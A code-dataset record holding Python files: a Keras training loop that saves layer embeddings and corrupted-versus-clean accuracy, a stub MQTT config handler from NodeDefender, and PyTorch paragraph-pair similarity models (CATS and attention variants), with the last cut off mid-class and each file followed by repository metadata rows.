shape1, shape2 = y_val.shape
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
'''
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
'''
history=[]
#embeddings=[]
#layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in [2,6,11,14]]
# getting the embeddings at the layers of interest
#self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
st = time.time()
# We instantiate an image data generator to extract random crops of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
#train_generator = datagen.flow(x_train[shuffle_idxs_train],
# y_train[shuffle_idxs_train],
# batch_size=self.batch_size
# )
print('Train generator ready, time elapsed: {}'.format(time.time()-st))
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
batch_size=self.batch_size
tot_val_batches = len(x_val)/batch_size
epoch_number = 0
while epoch_number <= self.epochs:
#print(epoch_number)
batch_number = 0
start_batch=0
end_batch = batch_size
tr_losses = []
tr_accs = []
'''
while batch_number<len(x_train)/batch_size:
tr_loss, acc = self.model.train_on_batch(x_train[shuffle_idxs_train[start_batch:end_batch], :299, :299, :3],
y_train[shuffle_idxs_train[start_batch:end_batch]]
)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number +=1
#print(tr_accs)
'''
'''
if epoch_number % 10 == 0:
#import pdb; pdb.set_trace()
## saving validation!At the end of the epoch we validate on the
# validation split and save the embeddings
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no < tot_val_batches:
#index_start = shuffle_idxs_val[]
score = self.model.test_on_batch(x_val[shuffle_idxs_val[start_batch:end_batch]],
y_val[shuffle_idxs_val[start_batch:end_batch]])
#score = self.model.evaluate(x_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# y_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# batch_size=32)
#print("Validation batch no: {}, acc: {}".format(val_batch_no, score))
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print(scores)
print("Val: {}".format(np.mean(np.asarray(scores))))
'''
if epoch_number % 10 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_val), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_val), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_val[shuffle_idxs_val[start_batch:end_batch]], l)
# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_fix_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
for x_batch, y_batch in datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=batch_size):
# training step
tr_loss, acc = self.model.train_on_batch(x_batch, y_batch)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number += 1
# stopping condition if all data have been passed through
# because the generator loops indefinitely
if batch_number >= len(x_train)/batch_size:
break
print('Epoch: {}, loss: {}, acc: {}'.format(epoch_number,
np.mean(np.asarray(tr_losses)),
np.mean(np.asarray(tr_accs))
))
epoch_number +=1
self.training_history=history
#self.embeddings = embeddings
def _custom_eval(self, x, y, batch_size):
## correcting shape-related issues
x = x.reshape(x.shape[0], x.shape[2], x.shape[3], x.shape[4])
y = y.reshape(y.shape[0],-1)
#
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
tot_batches = len(y) / batch_size
# looping over data
while val_batch_no < tot_batches:
score = self.model.test_on_batch(x[start_batch:end_batch, :299, :299, :3],
y[start_batch:end_batch])
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print("Val: {}".format(np.mean(np.asarray(scores))))
return np.mean(np.asarray(scores))
def train_and_monitor_with_rcvs(self, dataset, layers_of_interest=[], custom_epochs=0):
import time
# making the data ready for training
x_train = dataset.x_train
x_train = np.asarray(x_train, dtype=np.float32)
y_train = dataset.y_train
x_val = dataset.x_val
x_val = np.asarray(x_val, dtype=np.float32)
y_val = dataset.y_val
train_mask = dataset.train_mask
# We first need to shuffle the dataset indexes then we launch training
shuffle_idxs_train = np.arange(len(x_train))
np.random.shuffle(shuffle_idxs_train)
corrupted_idxs = np.argwhere(train_mask == True)
uncorrupted_idxs = np.argwhere(train_mask == False)
#import pdb; pdb.set_trace()
try:
localtime = time.localtime(time.time())
directory_save = '/mnt/nas2/results/IntermediateResults/Mara/probes/experiment_{}.{}_{}.{}'.format(localtime.tm_mday, localtime.tm_mon, localtime.tm_hour, localtime.tm_min)
os.mkdir(directory_save)
except:
print("ERROR: could not create the results directory")
np.save(directory_save+'/shuffle_idxs_training', shuffle_idxs_train)
shuffle_idxs_val = np.arange(len(x_val))
np.random.shuffle(shuffle_idxs_val)
np.save(directory_save+'/shuffle_idxs_validation', shuffle_idxs_val)
# We clean the data
x_train[:,:,:,:3] -= np.mean(x_train[:,:,:,:3])
x_train[:,:,:,:3] /= np.std(x_train[:,:,:,:3])
x_val -= np.mean(x_val[:,:,:,:3])
x_val /= np.std(x_val[:,:,:,:3])
#import pdb; pdb.set_trace()
# At this point in time the mean and std of the image data are respectively 0 and 1
# The mask of the image boundaries is left untouched (checked via pdb)
try:
shape1, shape2 = y_train.shape
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
try:
shape1, shape2 = y_val.shape
except:
y_val = keras.utils.to_categorical(y_val, self.n_classes)
'''
try:
shape1, shape2 = y_train.shape()
except:
y_train = keras.utils.to_categorical(y_train, self.n_classes)
'''
history=[]
#embeddings=[]
#layers_of_interest = [self.model.layers[layer_idx].name for layer_idx in [2,6,11,14]]
# getting the embeddings at the layers of interest
#self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
st = time.time()
# We instantiate an image data generator to extract random crops of size 299x299x3
# from the images in x_train
datagen = ImageDataGenerator(featurewise_center=False,
featurewise_std_normalization=False,
random_cropping=True
)
datagen.fit(x_train[shuffle_idxs_train, :, :, :3])
train_generator = datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=self.batch_size
)
print('Train generator ready, time elapsed: {}'.format(time.time()-st))
if custom_epochs>0:
epochs = custom_epochs
else:
epochs = self.epochs
batch_size=self.batch_size
tot_val_batches = len(x_val)/batch_size
epoch_number = 0
while epoch_number <= self.epochs:
#print(epoch_number)
batch_number = 0
start_batch=0
end_batch = batch_size
tr_losses = []
tr_accs = []
for x_batch, y_batch in datagen.flow(x_train[shuffle_idxs_train],
y_train[shuffle_idxs_train],
batch_size=batch_size):
# training step
tr_loss, acc = self.model.train_on_batch(x_batch, y_batch)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number += 1
# stopping condition if all data have been passed through
# because the generator loops indefinitely
if batch_number >= len(x_train)/batch_size:
break
if len(uncorrupted_idxs)>0:
if epoch_number %10 == 0:
'''storing the corr, uncorr acc every 10 epochs to save space/time'''
corrupted_acc = self._custom_eval(x_train[corrupted_idxs],
y_train[corrupted_idxs],
batch_size)
uncorrupted_acc = self._custom_eval(x_train[uncorrupted_idxs],
y_train[uncorrupted_idxs],
batch_size)
try:
with open(directory_save+'/corr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(corrupted_acc))
except:
with open(directory_save+'/corr_acc.txt', 'w') as log_file:
log_file.write("{}, ".format(corrupted_acc))
try:
with open(directory_save+'/uncorr_acc.txt', 'a') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
except:
with open(directory_save+'/uncorr_acc.txt', 'w') as log_file:
log_file.write("{}, ".format(uncorrupted_acc))
### introduce _custom_eval(x_train[corrupted_idxs])
#### _custom_eval(x_train[uncorrupted_idxs])
'''
while batch_number<len(x_train)/batch_size:
tr_loss, acc = self.model.train_on_batch(x_train[shuffle_idxs_train[start_batch:end_batch], :299, :299, :3],
y_train[shuffle_idxs_train[start_batch:end_batch]]
)
tr_losses.append(tr_loss)
tr_accs.append(acc)
batch_number +=1
#print(tr_accs)
'''
print('Epoch: {}, loss: {}, acc: {}'.format(epoch_number,
np.mean(np.asarray(tr_losses)),
np.mean(np.asarray(tr_accs))
)
)
if epoch_number % 10 == 0:
#import pdb; pdb.set_trace()
## saving validation! At the end of the epoch we validate on the
# validation split and save the embeddings
scores = []
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no < tot_val_batches:
#index_start = shuffle_idxs_val[]
score = self.model.test_on_batch(x_val[shuffle_idxs_val[start_batch:end_batch]],
y_val[shuffle_idxs_val[start_batch:end_batch]])
#score = self.model.evaluate(x_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# y_val[val_batch_no*batch_size : val_batch_no*batch_size + batch_size],
# batch_size=32)
#print("Validation batch no: {}, acc: {}".format(val_batch_no, score))
scores.append(score[1])
val_batch_no += 1
start_batch = end_batch
end_batch += batch_size
#print(scores)
print("Val: {}".format(np.mean(np.asarray(scores))))
'''
if epoch_number % 1000 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_train), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_train[shuffle_idxs_val[start_batch:end_batch]], l)
# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
if epoch_number % 10 == 0:
# allocating space and reusing the variable embedding_
embedding_=[]
for l in layers_of_interest:
if len(self.model.get_layer(l).output.shape)<=2:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
else:
#x = self.model.get_layer(l).output.shape[-3]
#y = self.model.get_layer(l).output.shape[-2]
z = self.model.get_layer(l).output.shape[-1]
#space = np.zeros((len(x_val), x,y,z))
# Update: only storing/saving the pooled embeddings bc I'm filling up all the hard drives
space = np.zeros((len(x_train), z))
embedding_.append(space)
# this is a layer counter. I use it only to store the activations in the correct place in embedding_
k=0
for l in layers_of_interest:
val_batch_no = 0
start_batch = val_batch_no
end_batch = start_batch + batch_size
while val_batch_no <= tot_val_batches:
outs=self.get_activations(x_train[shuffle_idxs_val[start_batch:end_batch]], l)
# Global Average Pooling the activations : saves space and removes pixel dependencies
dims = outs.shape
avgp_outs = skimage.measure.block_reduce(outs, (1, dims[1], dims[2],1), np.mean)
avgp_outs= avgp_outs.reshape((dims[0],-1))
#import pdb; pdb.set_trace()
embedding_[k][start_batch:end_batch]=avgp_outs
## end GAP. Like this it should take less space on the disk and solve all the problems
val_batch_no += 1
start_batch=end_batch
end_batch += batch_size
k += 1
# Saving outputs on an external file
c=0
for l in layers_of_interest:
np.save(directory_save+'/_training_emb_e{}_l{}_val_data'.format(epoch_number, l), embedding_[c])
# saving all the GAP acts with the name starting by _ so I can differentiate them
c+=1
'''
epoch_number +=1
self.training_history=history
#self.embeddings = embeddings
def save(self, name, folder):
try:
os.listdir(folder)
except:
os.mkdir(folder)
#model_json = self.model.to_json()
#with open(folder+"/"+name+".json", "w") as json_file:
# json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(folder+"/"+name+".h5")
print("Saved model to disk")
try:
np.save(folder+'/'+name+'_history', self.training_history.history)
except:
print "History not saved"
return
| 43.558201 | 190 | 0.560325 | 8,065 | 65,860 | 4.349659 | 0.061872 | 0.044641 | 0.022748 | 0.025086 | 0.901055 | 0.886545 | 0.867474 | 0.855217 | 0.851995 | 0.840564 | 0 | 0.022332 | 0.335044 | 65,860 | 1,511 | 191 | 43.587028 | 0.778691 | 0.123428 | 0 | 0.826415 | 0 | 0 | 0.039646 | 0.018505 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.013836 | null | null | 0.033962 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8c8a77e5b1874bff721e091896b57b252e0f8230 | 200 | py | Python | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 4 | 2016-09-23T17:51:05.000Z | 2017-03-14T02:52:26.000Z | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 1 | 2016-09-22T11:32:33.000Z | 2017-11-14T10:00:24.000Z | NodeDefender/mqtt/message/respond/icpe/sys/config.py | CTSNE/NodeDefender | 24e19f53a27d3b53e599cba8b1448f8f16c0bd5e | [
"MIT"
] | 4 | 2016-10-09T19:05:16.000Z | 2020-05-14T04:00:30.000Z | import NodeDefender
def save(topic, payload):
return True
def default(topic, payload):
return True
def backup(topic, payload):
return True
def restore(topic, payload):
return True
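# Note (added): all four handlers above are placeholder stubs; they acknowledge
# the MQTT message by returning True without persisting or applying any
# configuration.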
| 14.285714 | 28 | 0.71 | 26 | 200 | 5.461538 | 0.423077 | 0.338028 | 0.507042 | 0.619718 | 0.528169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21 | 200 | 13 | 29 | 15.384615 | 0.898734 | 0 | 0 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.444444 | false | 0 | 0.111111 | 0.444444 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8c9ca5927feb19eae6d7b269613e91e01bb0fd39 | 16,294 | py | Python | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | model/layers.py | anonymous-author1990/QS3M | 8fa16b621e5507258c0fea76a8e53b0ab8ab3423 | [
"Apache-2.0"
] | null | null | null | import torch
torch.manual_seed(42)
import torch.nn as nn
class CATS(nn.Module): # CATS
def __init__(self, emb_size):
super(CATS, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.z1 = torch.abs(self.Xp1 - self.Xq)
self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
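# Hedged usage sketch (not part of the original file): X packs the query,
# first-paragraph and second-paragraph embeddings side by side, so for
# emb_size=768 a batch of 16 pairs would be scored as:
#     model = CATS(emb_size=768)
#     X = torch.randn(16, 3 * 768)  # random stand-in for real embeddings
#     scores = model(X)             # shape (16,)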
class CATS_Ablation(nn.Module):
def __init__(self, emb_size):
super(CATS_Ablation, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(3 * emb_size, 1)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
#self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
#self.z1 = torch.abs(self.Xp1 - self.Xq)
#self.z2 = torch.abs(self.Xp2 - self.Xq)
self.zdiff = torch.abs(self.Xp1 - self.Xp2)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2)))
#self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
#self.zdqp1 = torch.abs(self.zp1 - self.zql)
#self.zdqp2 = torch.abs(self.zp2 - self.zql)
#self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
self.z = torch.cat((self.zp1, self.zp2, self.zd), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class Sent_Attention(nn.Module):
def __init__(self, emb_size, n):
super(Sent_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
self.Wa = nn.Parameter(torch.randn(2*emb_size, self.n).to(device))  # nn.Parameter is trainable by default; re-wrapping with torch.tensor only triggered a copy warning
self.va = nn.Parameter(torch.randn(self.n, 1).to(device))
self.tanh = nn.Tanh()
self.cos = nn.CosineSimilarity()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0,2,1).reshape(-1, 2*self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
o = self.cos(self.Xp1dash, self.Xp2dash)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
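# Note (added): the attention above is additive (Bahdanau-style): per sentence
# position, score = va^T tanh(Wa [q; p]), masked by the validity channel,
# softmax-normalised over positions, and used to pool sentence vectors into a
# single vector per paragraph; the two pooled vectors are then compared with
# cosine similarity.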
class CATS_Attention(nn.Module):
def __init__(self, emb_size, n):
super(CATS_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(5 * emb_size, 1)
self.Wa = nn.Parameter(torch.randn(2 * emb_size, self.n).to(device))
self.va = nn.Parameter(torch.randn(self.n, 1).to(device))
self.tanh = nn.Tanh()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
self.z1 = torch.abs(self.Xp1dash - self.Xq)
self.z2 = torch.abs(self.Xp2dash - self.Xq)
self.zdiff = torch.abs(self.Xp1dash - self.Xp2dash)
self.zp1 = torch.relu(self.LL2(self.LL1(self.Xp1dash)))
self.zp2 = torch.relu(self.LL2(self.LL1(self.Xp2dash)))
self.zql = torch.relu(self.LL2(self.LL1(self.Xq)))
self.zd = torch.abs(self.zp1 - self.zp2)
self.zdqp1 = torch.abs(self.zp1 - self.zql)
self.zdqp2 = torch.abs(self.zp2 - self.zql)
self.z = torch.cat((self.zp1, self.zp2, self.zd, self.zdqp1, self.zdqp2), dim=1)
o = torch.relu(self.LL3(self.z))
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class Sent_FixedCATS_Attention(nn.Module):
def __init__(self, emb_size, n, cats_model):
super(Sent_FixedCATS_Attention, self).__init__()
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.emb_size = emb_size
self.n = n
self.cats = cats_model
self.cats.eval()
self.Wa = nn.Parameter(torch.randn(2*emb_size, self.n).to(device))
self.va = nn.Parameter(torch.randn(self.n, 1).to(device))
self.tanh = nn.Tanh()
self.cos = nn.CosineSimilarity()
def forward(self, Xq, Xp):
'''
:param Xq: context vec of shape (m X vec size)
:param Xp: para sent vecs of shape (m X 2*vec size + 2 X max seq len)
:return: Pairwise CATS scores of shape (mC2 X 1)
'''
b = Xq.shape[0]
seq = Xp.shape[2]
self.Xq = Xq
self.origXq = Xq
self.Xp1 = Xp[:, :self.emb_size + 1, :]
self.Xp2 = Xp[:, self.emb_size + 1:, :]
self.Xp1valid = self.Xp1[:, -1, :]
self.Xp2valid = self.Xp2[:, -1, :]
self.Xp1 = self.Xp1[:, :self.emb_size, :]
self.Xp2 = self.Xp2[:, :self.emb_size, :]
self.Xqp1 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp1), 1)
self.S1 = torch.mul(self.Xp1valid, torch.mm(self.tanh(
torch.mm(self.Xqp1.permute(0,2,1).reshape(-1, 2*self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta1 = torch.exp(self.S1) / torch.sum(torch.exp(self.S1), 1).unsqueeze(1).repeat(1, seq)
self.Xp1dash = torch.sum(torch.mul(self.beta1.reshape(b, 1, seq), self.Xp1), 2)
self.Xqp2 = torch.cat((self.Xq.reshape(b, self.emb_size, 1).expand(-1, -1, seq), self.Xp2), 1)
self.S2 = torch.mul(self.Xp2valid, torch.mm(self.tanh(
torch.mm(self.Xqp2.permute(0, 2, 1).reshape(-1, 2 * self.emb_size), self.Wa)), self.va).reshape(b, seq))
self.beta2 = torch.exp(self.S2) / torch.sum(torch.exp(self.S2), 1).unsqueeze(1).repeat(1, seq)
self.Xp2dash = torch.sum(torch.mul(self.beta2.reshape(b, 1, seq), self.Xp2), 2)
X = torch.cat((self.origXq, self.Xp1dash, self.Xp2dash), 1)
o = self.cats(X)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_Scaled(nn.Module): # CAVS
def __init__(self, emb_size):
super(CATS_Scaled, self).__init__()
self.emb_size = emb_size
self.n = 32
self.LL1 = nn.Linear(emb_size, self.n)
if torch.cuda.is_available():
device = torch.device('cuda:0')
else:
device = torch.device('cpu')
self.A = nn.Parameter(torch.randn(self.n, emb_size).to(device))
self.cos = nn.CosineSimilarity()
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
self.Xp2 = X[:, 2 * self.emb_size:]
self.Xlq = torch.relu(self.LL1(self.Xq))
self.scale = torch.mm(self.Xlq, self.A)
self.zp1 = torch.mul(self.Xp1, self.scale)
self.zp2 = torch.mul(self.Xp2, self.scale)
o = self.cos(self.zp1, self.zp2)
o = o.reshape(-1)
return o
def num_flat_features(self, X):
size = X.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def predict(self, X_test):
y_pred = self.forward(X_test)
return y_pred
class CATS_QueryScaler(nn.Module):
def __init__(self, emb_size):
super(CATS_QueryScaler, self).__init__()
self.emb_size = emb_size
self.LL1 = nn.Linear(emb_size, emb_size)
self.LL2 = nn.Linear(emb_size, emb_size)
self.LL3 = nn.Linear(emb_size, emb_size)
self.cos = nn.CosineSimilarity()
self.pdist = nn.PairwiseDistance(p=2)
def forward(self, X):
'''
:param X: The input tensor is of shape (mC2 X 3*vec size) where m = num of paras for each query
:return s: Pairwise CATS scores of shape (mC2 X 1)
'''
self.Xq = X[:, :self.emb_size]
self.Xp1 = X[:, self.emb_size:2 * self.emb_size]
